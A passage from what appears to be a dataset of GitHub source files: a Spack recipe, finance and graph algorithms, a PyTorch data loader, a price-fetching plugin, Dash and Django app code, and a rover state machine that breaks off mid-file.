current_version","repo_name":"Jonasdart/SESP-API","sub_path":"commons/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40567759795","text":"from spack import *\n\n\nclass 
Bayeux(CMakePackage):\n \"\"\"SuperNEMO Core Data/Geometry/EventGen library\n \"\"\"\n\n homepage = \"https://github.com/SuperNEMO-DBD/Bayeux\"\n url = \"https://github.com/SuperNEMO-DBD/Bayeux/archive/3.3.0.tar.gz\"\n\n version('3.3.0', sha256='6468251da50214e744651260770bf252f677a8f9b9f822085c38dc69d71b52a9')\n version('3.1.2', sha256='2bf6b887e654fadbb7373fbea550ec14adc8836758fb029bf56c76bb5177827d')\n\n variant('cxxstd',\n default='11',\n values=('11', '14', '17'),\n multi=False,\n description='Use the specified C++ standard when building.')\n\n variant('geant4', default=False, description='Build mctools Geant4 module')\n variant('qt', default=False, description='Build datatools/variant browser')\n\n depends_on('cmake@3.3:', type='build')\n depends_on('boost@1.63:+icu')\n depends_on('camp@0.8.0')\n depends_on('clhep@2.1.3.1')\n depends_on('gsl@2.4:')\n depends_on('readline')\n depends_on('root@6.12:')\n\n # optional geant4/qt\n depends_on('geant4@:9.6 cxxstd=11', when='+geant4 cxxstd=11')\n depends_on('qt5base', when='+qt')\n\n\n\n def cmake_args(self):\n spec = self.spec\n args = [\n '-DBAYEUX_COMPILER_ERROR_ON_WARNING=OFF',\n '-DBAYEUX_ENABLE_TESTING=OFF',\n '-DBAYEUX_WITH_DOCS=OFF',\n '-DBAYEUX_CXX_STANDARD={0}'.format(spec.variants['cxxstd'].value)\n ]\n\n if spec.satisfies('+geant4'):\n args.append('-DBAYEUX_WITH_GEANT4_MODULE=ON')\n else:\n args.append('-DBAYEUX_WITH_GEANT4_MODULE=OFF')\n\n if spec.satisfies('+qt'):\n args.append('-DBAYEUX_WITH_QT_GUI=ON')\n else:\n args.append('-DBAYEUX_WITH_QT_GUI=OFF')\n\n return args\n","repo_name":"SuperNEMO-DBD/spack-supernemo","sub_path":"packages/bayeux/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37836188609","text":"import numpy as np\n\n# bachelier_call is assumed to be provided elsewhere in the accompanying code.\n\ndef sabr_normal_vol(S_0,K,T,sigma_0,alpha,beta,rho):\n c = lambda x: x**beta\n c_prime = lambda x: beta*(x**(beta-1))\n c_prime_prime = lambda x: beta*(beta-1)*(x**(beta-2))\n S_mid = (S_0 + K)/2\n gamma_1 = c_prime(S_mid)/c(S_mid)\n gamma_2 = c_prime_prime(S_mid)/c(S_mid)\n zeta = alpha*(S_0**(1-beta) - K**(1-beta))/(sigma_0 * (1-beta))\n epsilon = T*(alpha**2)\n delta = np.log( (np.sqrt(1 - 2*rho*zeta + zeta**2) + zeta - rho)/(1-rho) )\n\n factor = alpha*(S_0 - K)/(delta)\n term_1 = ((2*gamma_2 - gamma_1**2)/24)* (sigma_0*c(S_mid) / alpha)**2\n term_2 = rho*gamma_1*sigma_0*c(S_mid)/(4*alpha)\n term_3 = (2-3*(rho**2))/24\n return factor*(1 + epsilon*(term_1 + term_2 + term_3))\n\ndef sabr_call(S_0,K,T,sigma_0,r,alpha,beta,rho):\n assert(S_0 != K)\n vol = sabr_normal_vol(S_0,K,T,sigma_0,alpha,beta,rho)\n return bachelier_call(S_0,K,T,vol,r)","repo_name":"lingyixu/Quant-Finance-With-Python-Code","sub_path":"chapter8/8_2_4.py","file_name":"8_2_4.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"33320146601","text":"from IPython.display import Image \r\nfrom PIL import Image\r\nimport albumentations as A \r\nfrom albumentations.pytorch import ToTensorV2\r\nfrom torch.utils.data import DataLoader, Dataset, WeightedRandomSampler\r\nimport torch\r\nimport numpy as np\r\nimport os\r\n\r\nclass DataFolder(Dataset):\r\n def __init__(self, root_directory, transform=None):\r\n super(DataFolder,self).__init__() \r\n self.data = []\r\n self.root_directory = root_directory\r\n self.transform = transform\r\n self.class_names = os.listdir(root_directory)\r\n # Loop through the folders and add 
labels (signs: 0, notsigns: 1)\r\n for index_labels, name in enumerate(self.class_names):\r\n if name == 'cctvsign':\r\n files_data = os.listdir(os.path.join(root_directory,name))\r\n self.data += list(zip(files_data, [index_labels]*len(files_data)))\r\n else:\r\n files_data = os.listdir(os.path.join(root_directory,name))\r\n self.data += list(zip(files_data, [index_labels]*len(files_data)))\r\n \r\n def __len__(self):\r\n return len(self.data)\r\n \r\n def __getitem__(self, index):\r\n img_name , label = self.data[index]\r\n root_and_dir = os.path.join(self.root_directory,self.class_names[label])\r\n # Traffic sign images have 4 channels and need to be converted to 3 with convert(\"RGB\")\r\n image = np.array(Image.open(os.path.join(root_and_dir,img_name)).convert(\"RGB\"))\r\n\r\n if self.transform is not None:\r\n augmentations_images = self.transform(image=image)\r\n image = augmentations_images['image']\r\n\r\n return image, label\r\n\r\ntrain_transform = A.Compose(\r\n [\r\n A.Resize(35,35),\r\n A.HorizontalFlip(p=0.65),\r\n A.VerticalFlip(p=0.65),\r\n A.Rotate(limit=40,p=0.65),\r\n A.RGBShift(r_shift_limit=25, g_shift_limit=25,b_shift_limit=25,p=0.65),\r\n A.Normalize(\r\n mean=(0,0,0),\r\n std =(1,1,1),\r\n max_pixel_value=225,\r\n p=1),\r\n A.OneOf([\r\n A.Blur(blur_limit=3, p=0.65),\r\n A.ColorJitter(p=0.5)\r\n ],p=1.0),\r\n \r\n ToTensorV2(),\r\n ]\r\n)\r\ntest_transform = A.Compose(\r\n [\r\n A.Resize(35,35),\r\n A.Normalize(\r\n mean=(0,0,0),\r\n std =(1,1,1),\r\n max_pixel_value=225,\r\n p=1),\r\n \r\n ToTensorV2(),\r\n ]\r\n)\r\n\r\n\r\n#Load the datasets \r\ntrain_dataset = DataFolder(root_directory=r'C:\\Users\\alexa\\University\\Master\\DSP-A2\\DSPA2\\dataset\\train_data',transform=train_transform)\r\ntest_dataset = DataFolder(root_directory=r'C:\\Users\\alexa\\University\\Master\\DSP-A2\\DSPA2\\dataset\\test_data',transform=test_transform)\r\n# Sampler to correct the randomized batch in the dataloader\r\n# list of labels, and class-count function \r\n\r\ndef classes(dataset):\r\n class_cctv = 0 \r\n class_not_cctv = 0\r\n labels_list = []\r\n for x, y in dataset:\r\n if y ==0:\r\n class_cctv += 1\r\n labels_list.append(y)\r\n if y==1:\r\n class_not_cctv += 1\r\n labels_list.append(y)\r\n return class_cctv,class_not_cctv,labels_list\r\n\r\n#sampler function\r\ndef sampler(class_1,class_2,labels_list):\r\n class_total_count = [class_1,class_2]\r\n weights_class = 1./torch.tensor(class_total_count, dtype=torch.float) \r\n class_weights_all = weights_class [labels_list]\r\n balanced_sampler = WeightedRandomSampler(\r\n weights=class_weights_all,\r\n num_samples=len(class_weights_all),\r\n replacement=True\r\n )\r\n return balanced_sampler\r\n\r\n\r\ntrain_data_sampler = classes(train_dataset)\r\ntest_data_sampler = classes(test_dataset)\r\n\r\nsampler_train = sampler(train_data_sampler[0],train_data_sampler[1],train_data_sampler[2]) \r\nsampler_test = sampler(test_data_sampler[0],test_data_sampler[1],test_data_sampler[2])\r\n\r\n\r\nbatch_size = 64\r\ntrain_loader = DataLoader(dataset=train_dataset, batch_size=batch_size,sampler=sampler_train)\r\ntest_loader = DataLoader(dataset=test_dataset, batch_size=batch_size,sampler = sampler_test)\r\nprint(len(train_dataset))\r\nprint(len(test_dataset))\r\n\r\n# 
/Users/rinusvangrunsven/Documents/GitHub/DSPA2/dataset/train_data\r\n","repo_name":"sofiamluisa/DSPA2","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74348685011","text":"\"\"\"A source fetching prices and exchangerates from https://www.alphavantage.co.\n\nIt requires a free api key which needs to be set in the\nenvironment variable \"ALPHAVANTAGE_API_KEY\"\n\nValid tickers for prices are in the form \"price:XXX:YYY\", such as \"price:IBM:USD\"\nwhere XXX is the symbol and YYY is the expected quote currency in which the data\nis returned. The api currently does not support converting to a specific ccy and\ndoes unfortunately not return in which ccy the result is.\n\nValid tickers for exchangerates are in the form \"fx:XXX:YYY\", such as \"fx:USD:CHF\".\n\nHere is the API documentation:\nhttps://www.alphavantage.co/documentation/\n\nFor example:\n\n\nhttps://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol=IBM&apikey=demo\n\nhttps://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE&from_currency=USD&to_currency=JPY&apikey=demo\n\n\"\"\"\n\nfrom decimal import Decimal\n\nimport re\nfrom os import environ\nfrom time import sleep\nimport requests\nfrom dateutil.tz import tz\nfrom dateutil.parser import parse\n\nfrom beanprice import source\n\n\nclass AlphavantageApiError(ValueError):\n \"An error from the Alphavantage API.\"\n\ndef _parse_ticker(ticker):\n \"\"\"Parse the base and quote currencies from the ticker.\n\n Args:\n ticker: A string, the symbol in kind-XXX-YYY format.\n Returns:\n A (kind, symbol, base) tuple.\n \"\"\"\n match = re.match(r'^(?Pprice|fx):(?P[^:]+):(?P\\w+)$', ticker)\n if not match:\n raise ValueError(\n 'Invalid ticker. Use \"price:SYMBOL:BASE\" or \"fx:CCY:BASE\" format.')\n return match.groups()\n\ndef _do_fetch(params):\n params['apikey'] = environ['ALPHAVANTAGE_API_KEY']\n\n resp = requests.get(url='https://www.alphavantage.co/query', params=params)\n data = resp.json()\n # This is for dealing with the rate limit, sleep for 60 seconds and then retry\n if 'Note' in data:\n sleep(60)\n resp = requests.get(url='https://www.alphavantage.co/query', params=params)\n data = resp.json()\n\n if resp.status_code != requests.codes.ok:\n raise AlphavantageApiError(\"Invalid response ({}): {}\".format(resp.status_code,\n resp.text))\n\n if 'Error Message' in data:\n raise AlphavantageApiError(\"Invalid response: {}\".format(data['Error Message']))\n\n return data\n\n\nclass Source(source.Source):\n\n def get_latest_price(self, ticker):\n kind, symbol, base = _parse_ticker(ticker)\n\n if kind == 'price':\n params = {\n 'function': 'GLOBAL_QUOTE',\n 'symbol': symbol,\n }\n data = _do_fetch(params)\n\n price_data = data['Global Quote']\n price = Decimal(price_data['05. price'])\n date = parse(price_data['07. latest trading day']).replace(tzinfo=tz.tzutc())\n else:\n params = {\n 'function': 'CURRENCY_EXCHANGE_RATE',\n 'from_currency': symbol,\n 'to_currency': base,\n }\n data = _do_fetch(params)\n\n price_data = data['Realtime Currency Exchange Rate']\n price = Decimal(price_data['5. Exchange Rate'])\n date = parse(price_data['6. Last Refreshed']).replace(\n tzinfo=tz.gettz(price_data['7. 
Time Zone']))\n\n return source.SourcePrice(price, date, base)\n\n def get_historical_price(self, ticker, time):\n return None\n","repo_name":"beancount/beanprice","sub_path":"beanprice/sources/alphavantage.py","file_name":"alphavantage.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"66"} +{"seq_id":"42428798713","text":"from dash import html, callback, Input, Output, dash_table\r\nfrom dash.dependencies import Input, Output, State\r\nimport time\r\nimport pandas as pd\r\nimport pathlib\r\nimport numpy as np\r\nimport dash_bootstrap_components as dbc\r\n\r\n# get relative data folder\r\nPATH = pathlib.Path(__file__).parent\r\n\r\nlayout = html.Div(children=[\r\n html.H1(children='Analytics', className=\"content\"),\r\n html.Button(\"Check for Missing and Duplicated Values\", id=\"button_2\"),\r\n html.Div(id='output-data-upload2'),\r\n html.Div(id='output-data-upload3'),\r\n])\r\n\r\n\r\n# Checks the percentage of missing/duplicated data within the dataset\r\ndef check_unique(content):\r\n df = pd.read_json(content, orient='split')\r\n output = []\r\n try:\r\n features_with_na = [features for features in df if df[features].isnull().sum() > 0]\r\n features_without_na = [features for features in df if df[features].isnull().sum() == 0]\r\n S1 = html.H6(\"This is the Percentage for missing data:\")\r\n output.append(S1)\r\n output.append(f\"{features_without_na} do not have missing data\")\r\n for feature in features_with_na:\r\n output.append(f\"{feature}:\")\r\n output.append(f\"{np.round(df[feature].isnull().mean(), 4) * 100}%\")\r\n features_with_dup = [features for features in df if df[features].duplicated().sum()]\r\n features_without_dup = [features for features in df if df[features].duplicated().sum() == 0]\r\n S2 = html.H6(\"This is the Percentage for duplicated data:\")\r\n output.append(S2)\r\n output.append(f\"{features_without_dup} do not have duplicated data\")\r\n for feature in features_with_dup:\r\n output.append(f\"{feature}:\")\r\n output.append(f\"{(np.round(df[feature].duplicated().mean(), 4) * 100)}%\")\r\n except Exception as e:\r\n print(e)\r\n return html.Div([\r\n html.H5(\"There was an error processing this file.\", className='analytics')\r\n ])\r\n return html.Div([\r\n html.Div([html.P(msg) for msg in output]),\r\n html.Hr(), # horizontal line\r\n ])\r\n\r\n\r\ndef remove_unique(content):\r\n content.dropna(inplace=True)\r\n content.drop_duplicates(inplace=True)\r\n\r\n return html.Div([\r\n dash_table.DataTable(\r\n content.to_dict('records'),\r\n [{'name': i, 'id': i} for i in content.columns],\r\n page_size=10\r\n ),\r\n\r\n html.Hr(), # horizontal line\r\n ])\r\n\r\n\r\n@callback(Output('output-data-upload2', 'children'),\r\n State('store', 'data'),\r\n Input(\"button_2\", \"n_clicks\"), prevent_initial_call=True)\r\ndef update_output2(stored_data, n):\r\n time.sleep(2)\r\n children = [\r\n check_unique(stored_data),\r\n html.Button(\"Remove Missing/Duplicated Values\", id=\"button_3\")]\r\n return children\r\n\r\n\r\n@callback(Output('output-data-upload3', 'children'),\r\n Output('store', 'data', allow_duplicate=True),\r\n State('store', 'data'),\r\n Input(\"button_3\", \"n_clicks\"), prevent_initial_call=True)\r\ndef update_output3(stored_data, n):\r\n df = pd.read_json(stored_data, orient='split')\r\n time.sleep(2)\r\n children = [\r\n remove_unique(df),\r\n # Next button, links to consistency page\r\n dbc.Button(\"Check Consistency\", 
href=\"http://localhost:8050/apps/consistency\", outline=True, color=\"danger\",\r\n id=\"dbc_button\")]\r\n return children, df.to_json(date_format='iso', orient='split')\r\n","repo_name":"CWilson2001/FinalYear","sub_path":"apps/missing_duplicated.py","file_name":"missing_duplicated.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27309742556","text":"from django.urls import path\nfrom .views import (\n QuizListView,\n quiz_view,\n quiz_data_view,\n save_quiz_view,\n over,\n redirect,\n new_data,\n # get_image\n \n)\n\napp_name = 'quizes'\n\nurlpatterns = [\n path('', QuizListView, name='main-view'),\n path(f'/', quiz_view, name='quiz-view'),\n path(f'/save/', save_quiz_view, name='save-view'),\n path(f'/data/', quiz_data_view, name='quiz-data-view'),\n path(f'sign-up/',over,name='sign-up'),\n path(f'redirect/',redirect,name='redirect'),\n path(f'file_data/',new_data,name='file_data'),\n # path('image/',get_image,name='image')\n # path(f'quiz/',quiz_automate)\n]\n","repo_name":"Boluex/Django_quiz_whatsapp_project","sub_path":"quizes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74337284370","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef _print(n) :\n print('[',end=' ')\n while n != None :\n print('{},'.format(n.val),end='')\n n = n.next\n print(']')\n\ndef sol (head) :\n # _print(head)\n cur = head\n while cur != None and cur.next != None :\n if cur.val == cur.next.val :\n cur.next = cur.next.next\n cur = head\n else :\n cur = cur.next\n return head\n\n\nif __name__ == \"__main__\" :\n # [1,1,2] \n l = list(map(int,input().strip('[]').split(',')))\n dummy = ListNode()\n cur = dummy\n for i in l :\n new = ListNode(i)\n cur.next = new\n cur = cur.next\n # _print(dummy)\n _print(sol(dummy.next))","repo_name":"GoldF15h/LeetCode","sub_path":"83. Remove Duplicates from Sorted List.py","file_name":"83. 
Remove Duplicates from Sorted List.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4116659320","text":"import random\nfrom time import sleep\nimport platform\nfrom sys import stdout\nfrom threading import Thread, Lock\nfrom multiprocessing import Pool\nfrom exec_proc import ExecProc\nfrom metric_thread import MetricThread\nimport logging\n\nclass Dispatcher:\n \n def __init__(self):\n pass\n \n def setConfig(self,config):\n self.config = config\n \n def printMetric(self,metric):\n print(metric + \" \" + str(random.randrange(0,99)) + \" \" + platform.node())\n \n def printOutput(self):\n self.printMetric(\"LOAD_1_MINUTE\")\n self.printMetric(\"LOAD_5_MINUTE\")\n self.printMetric(\"LOAD_15_MINUTE\")\n \n def run(self):\n stdoutmutex = Lock() # same as thread.allocate_lock()\n threads = []\n items = self.config.getItems()\n for i in items:\n# print(i.getName())\n thread = MetricThread(i,stdoutmutex) # create and start one thread per configured item\n thread.start() # starts run method in a thread\n threads.append(thread)\n for thread in threads:\n thread.join() # wait for thread exits\n \n def execute(self,executeProcess,inputs):\n pool = Pool(processes=len(inputs))\n print(type(executeProcess))\n print(type(inputs))\n print(type(len(inputs)))\n results = pool.map(executeProcess,inputs)\n pool.close()\n return all(results)\n","repo_name":"boundary/boundary-plugin-shell","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38205964151","text":"import math\n\ncoords = [\n (21.033333, 105.850000),\n (21.027763, 105.834160),\n (21.021602, 105.818118),\n (21.036386, 105.805088),\n (21.039070, 105.793105),\n (21.052364, 105.796972),\n (21.064834, 105.794064)\n]\n\ndef taoDoThiCoHuong():\n f = open('doThiCoHuong.txt')\n soLuongDinh = int(f.readline().strip())\n cacDong = f.readlines()\n f.close()\n\n doThi = [[0 for _ in range(soLuongDinh)] for _ in range(soLuongDinh)]\n for dong in cacDong:\n dsGiaTri = dong.split()\n if len(dsGiaTri) != 3:\n continue\n else:\n dong = int(dsGiaTri[0])\n cot = int(dsGiaTri[1])\n khoangCach = int(dsGiaTri[2])\n doThi[dong][cot] = khoangCach\n #endIf\n #endFor\n return doThi\n#endDef\n\ndsDinhDiQua = 0\n\ndef layDuongDi(dsDinhtruoc, dinhDich):\n global dsDinhDiQua\n dsDinhDiQua = [dinhDich]\n dinh = dinhDich\n while True:\n dinh = dsDinhtruoc[dinh]\n if dinh == None:\n break\n else:\n dsDinhDiQua.insert(0,dinh)\n #endif\n #endWhile\n dsDinhDiQuaString = [str(x) for x in dsDinhDiQua]\n return ' -> '.join(dsDinhDiQuaString)\n#endDef\n\ndef khoangCachMin(dsKhoangCach, dsDinhCayMin):\n nhoNhat = math.inf\n dinhNhoNhat = math.inf\n for dinh in range(len(dsKhoangCach)):\n if dsDinhCayMin[dinh] == False and dsKhoangCach[dinh] < nhoNhat:\n nhoNhat = dsKhoangCach[dinh]\n dinhNhoNhat = dinh\n #endIf\n #endFor\n return dinhNhoNhat\n#endDef\n\ndef dijkstra(doThi, dinhNguon, dinhDich):\n soLuongDinh = len(doThi)\n # Distance to every vertex starts at infinity\n dsKhoanhCach = [math.inf for _ in range(soLuongDinh)]\n # Distance from the source vertex to itself = 0\n dsKhoanhCach[dinhNguon] = 0\n dsDinhTruoc = [None for _ in range(soLuongDinh)]\n dsDinhCayMin = [False for _ in range(soLuongDinh)]\n\n for i in range(soLuongDinh):\n x = khoangCachMin(dsKhoanhCach, dsDinhCayMin)\n\n if x == math.inf:\n print(f'No path from vertex {dinhNguon} to vertex {dinhDich}')\n return\n #endIf\n\n 
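# Commit the nearest unvisited vertex to the shortest-path tree, then either stop\n # (destination reached) or relax the distances of its neighbours.\n 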
dsDinhCayMin[x] = True\n if x == dinhDich:\n print(f'Found a path from vertex {dinhNguon} to vertex {dinhDich}')\n duongDi = layDuongDi(dsDinhTruoc, dinhDich)\n thongBao = f'From vertex {dinhNguon} to vertex {dinhDich} : ' \\\n + duongDi + ' : ' + str(dsKhoanhCach[dinhDich])\n print(thongBao)\n return\n else:\n for y in range(soLuongDinh):\n if dsDinhCayMin[y] == False \\\n and doThi[x][y] > 0 and dsKhoanhCach[y] > dsKhoanhCach[x] + doThi[x][y]:\n dsKhoanhCach[y] = dsKhoanhCach[x] + doThi[x][y]\n dsDinhTruoc[y] = x\n #endIf\n #endFor\n #endIf\n #endFor\n#endDef\n\nhello = [[0 for _ in range(len(coords))] for _ in range(len(coords))]\nprint(hello)\n\n\n# doThi = taoDoThiCoHuong()\n# print(doThi) \n# soLuongDinh = len(doThi)\n# print('Number of vertices', soLuongDinh)\n# dinhNguon = int(input('Enter the source vertex: '))\n# dinhDich = int(input('Enter the destination vertex: '))\n# if dinhNguon in range(soLuongDinh) and dinhDich in range(soLuongDinh):\n# dijkstra(doThi, dinhNguon, dinhDich)\n# print(dsDinhDiQua)\n\n#endIf\n\n# # Driver code\n\n\n# def create_graph(coords):\n# graph = {}\n# for i in range(len(coords)):\n# graph[i] = {}\n# for j in range(len(coords)):\n# if i != j:\n# dist = haversine(coords[i][0], coords[i][1], coords[j][0], coords[j][1])\n# graph[i][j] = dist\n# return graph\n\n# def dijkstra(start, end, graph):\n# # Initialise the starting distances\n# distances = {vertex: float('infinity') for vertex in graph}\n# distances[start] = 0\n\n# # Use a heap to store vertices and their distances\n# pq = [(0, start)]\n# previous_vertices = {vertex: None for vertex in graph}\n\n# while len(pq) > 0:\n# current_distance, current_vertex = heapq.heappop(pq)\n\n# # If the current vertex is the destination, stop the algorithm\n# if current_vertex == end:\n# path = []\n# while current_vertex is not None:\n# path.append(current_vertex)\n# current_vertex = previous_vertices[current_vertex]\n\n# return path[::-1]\n\n# # Otherwise, update the distances to the neighbouring vertices\n# for neighbor, weight in graph[current_vertex].items():\n# distance = distances[current_vertex] + weight\n\n# # If the new distance is smaller than the current one, update it\n# if distance < distances[neighbor]:\n# distances[neighbor] = distance\n# previous_vertices[neighbor] = current_vertex\n# heapq.heappush(pq, (distance, neighbor))\n\n# return None\n\n# # Example of how to use the algorithm\n# coords = [\n# (21.033333, 105.850000),\n# (21.027763, 105.834160),\n# (21.021602, 105.818118),\n# (21.036386, 105.805088),\n# (21.039070, 105.793105),\n# (21.052364, 105.796972),\n# (21.064834, 105.794064)\n# ]\n# print(len(coords))\n# graph = create_graph(coords)\n# print(graph)\n# start = 0\n# end = 6\n\n# path = dijkstra(start, end, graph)\n# print(path)\n# if path is not None:\n# for i in range(len(path) - 1):\n# print(f\"Move from {coords[path[i]]} to {coords[path[i+1]]}\")\n# else:\n# print(f\"No path found from {start} to {end}\")\n\n\n","repo_name":"Shikamoto/Luan_Van_Push","sub_path":"main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33631003072","text":"import asyncio\nimport grpc\nimport logging\nimport pytest\n\nlogger = logging.getLogger(__name__)\n\n\nMAPPINGS_GRPC_ADDRESS = 'localhost:12033'\n\n\n@pytest.fixture()\nasync def grpc_mappings_channel(taxi_market_fast_mappings_reader):\n async with grpc.aio.insecure_channel(MAPPINGS_GRPC_ADDRESS) as channel:\n logger.info('gRPC channel opened')\n\n 
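# Wait up to 15 s for the channel to become ready; FIRST_COMPLETED returns as soon as it is.\n 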
done, _ = await asyncio.wait(\n [channel.channel_ready()],\n return_when=asyncio.FIRST_COMPLETED,\n timeout=15,\n )\n\n if not done:\n raise Exception(\n f'Failed to connect to remote gRPC server at '\n f'address {MAPPINGS_GRPC_ADDRESS}',\n )\n\n logger.info('gRPC channel ready')\n\n yield channel\n logger.info('gRPC channel closed')\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_market_fast_mappings_reader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41537679723","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sympy as sp\r\n\r\ndef graphing_rational(expr, x_vals):\r\n x = sp.Symbol('x')\r\n f_expr = sp.lambdify(x, expr, 'numpy')\r\n y_vals = f_expr(x_vals)\r\n\r\n plt.plot(x_vals, y_vals, label='f(x)')\r\n plt.xlabel('x')\r\n plt.ylabel('f(x)')\r\n plt.grid(True)\r\n plt.legend()\r\n plt.title('Rational Function')\r\n\r\n plt.show()\r\n\r\n# Express the shifted radical function\r\nx = sp.Symbol('x')\r\na = 2 # coefficient\r\nexpr = sp.sqrt(a * x) / (x**2 + 1) + 5 # shifted expression\r\n\r\n# set the x range\r\nx_vals = np.linspace(0, 10, 400)\r\n\r\n# draw the graph\r\ngraphing_rational(expr, x_vals)\r\n","repo_name":"ghfkdgo/laughing-parakeet","sub_path":"calculus_final/TEST_무리함수/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41691964671","text":"# -*- coding: utf-8 -*-\nfrom helper import *\nimport time\n\n\nclass Stop(object):\n def __init__(self, rover, brake=5):\n self.rover = rover\n self.brake = brake\n self.rover.steer = 0\n self.start_time = self.rover.total_time\n\n def __str__(self):\n return 'Stop'\n\n def delay(self, sec):\n if self.start_time == 0:\n self.start_time = self.rover.total_time\n delta = self.rover.total_time - self.start_time\n if delta <= sec:\n return False\n else:\n self.start_time = 0\n return True\n\n def run(self):\n self.rover.brake = self.brake\n self.rover.throttle = 0.0\n self.rover.steer = 0\n\n def next(self):\n self.rover.throttle = 0.0\n self.rover.steer = 0\n if abs(self.rover.vel) < 0.02:\n if self.delay(0.5):\n self.rover.brake = 0.0\n if self.rover.go_home:\n return ReturnHome(self.rover)\n else:\n return SearchClearPath(self.rover)\n else:\n return self\n else:\n return self\n\n\nclass Go(object):\n def __init__(self, rover, throttle=0.1):\n self.rover = rover\n self.throttle = throttle\n self.bearing = 0\n self.nav_data = None\n self.front_area = 0\n self.start_time = 0\n\n def __str__(self):\n return 'Go'\n\n def delay(self, sec):\n if self.start_time == 0:\n self.start_time = self.rover.total_time\n delta = self.rover.total_time - self.start_time\n if delta <= sec:\n # print 'stabilizing...', delta\n return False\n else:\n self.start_time = 0\n return True\n\n def run(self):\n self.rover.brake = 0\n self.rover.throttle = self.throttle\n\n def update_steering(self):\n self.nav_data = get_polar_points(self.rover)\n mean_dir = rad2deg(np.mean(get_near_periferics(self.nav_data, 100)))\n desv = rad2deg(np.sqrt(get_near_periferics(self.nav_data, 100).var()))\n AI, AD = side_areas(self.rover)\n if AI > 0.48:\n self.bearing = np.int_(mean_dir)\n self.rover.steer = np.clip(self.bearing, -15, 15)\n elif AI > 0.25:\n self.bearing = np.int_(mean_dir + 0.8 * desv)\n self.rover.steer = np.clip(self.bearing, -2, 15)\n elif AI < 0.20:\n self.bearing = np.int_(mean_dir + 0.5 * desv)\n self.rover.steer = 
np.clip(self.bearing, -12, 12)\n else:\n self.bearing = 0\n self.rover.steer = self.bearing\n\n def check_area_stop(self):\n if len(self.rover.nav_angles) > self.rover.stop_forward:\n return True\n else:\n return False\n\n def check_vel_max(self):\n if self.rover.vel >= self.rover.max_vel:\n self.rover.throttle = 0.0\n else:\n self.rover.throttle = self.rover.throttle_set\n\n def stuck(self):\n if self.rover.vel < 0.02:\n if self.delay(0.3):\n if self.rover.throttle > 0:\n return True\n else:\n return False\n return False\n else:\n return False\n\n def check_rock_sight(self):\n if distance_to_rock(self.rover) > 0:\n return True\n else:\n return False\n\n def next(self):\n print('area: ', len(self.rover.nav_angles))\n print('front area:', self.front_area)\n if self.check_rock_sight():\n self.rover.rock_detected = True\n return Stop(self.rover, brake=2)\n if self.check_area_stop(): # and is_obstacle_ahead(self.rover) ==\n self.check_vel_max()\n self.update_steering()\n self.front_area = is_obstacle_ahead(\n self.rover, range=20, bearing=self.bearing)\n if self.front_area > 100:\n print('front area:', self.front_area)\n return Stop(self.rover)\n if self.stuck():\n return Stuck(self.rover)\n else:\n return self\n else:\n return Stop(self.rover)\n\n\nclass SearchClearPath(object):\n def __init__(self, rover, turn='right'):\n self.rover = rover\n self.turn_direction = turn\n self.iteration = 0\n\n def __str__(self):\n return 'SearchClearPath'\n\n def run(self):\n self.rover.brake = 0.0\n\n def update_turn(self):\n if self.turn_direction == 'right':\n self.rover.steer = -15\n elif self.turn_direction == 'left':\n self.rover.steer = 15\n self.iteration += 1\n\n def toggle_turn(self):\n if self.turn_direction == 'right':\n self.turn_direction = 'left'\n elif self.turn_direction == 'left':\n self.turn_direction = 'right'\n\n def next(self):\n self.update_turn()\n AI, AD = side_areas(self.rover)\n print('iter: ', self.iteration)\n print('area: ', len(self.rover.nav_angles))\n print('AI:', AI)\n if self.rover.rock_detected:\n return Rock(self.rover)\n else:\n if len(self.rover.nav_angles) >= self.rover.go_forward:\n if is_obstacle_ahead(self.rover, 25, 0, arc=15) > 40:\n return self\n else:\n if AI < 0.48:\n return self\n else:\n self.iteration = 0\n self.rover.steer = 0\n return Go(self.rover)\n # elif self.iteration < 100:\n # return self\n elif self.iteration == 500:\n # raw_input()\n # self.iteration += 1\n self.toggle_turn()\n return self\n elif self.iteration >= 1000:\n # raw_input()\n # self.iteration += 1\n # if self.iteration >= 200:\n # raw_input()\n self.iteration = 0\n return Go(self.rover)\n # else:\n # return self\n else:\n # self.iteration +=1\n return self\n\n\nclass Stuck(object):\n def __init__(self, rover):\n self.rover = rover\n self.times = 0\n\n def __str__(self):\n return 'Stuck'\n\n def 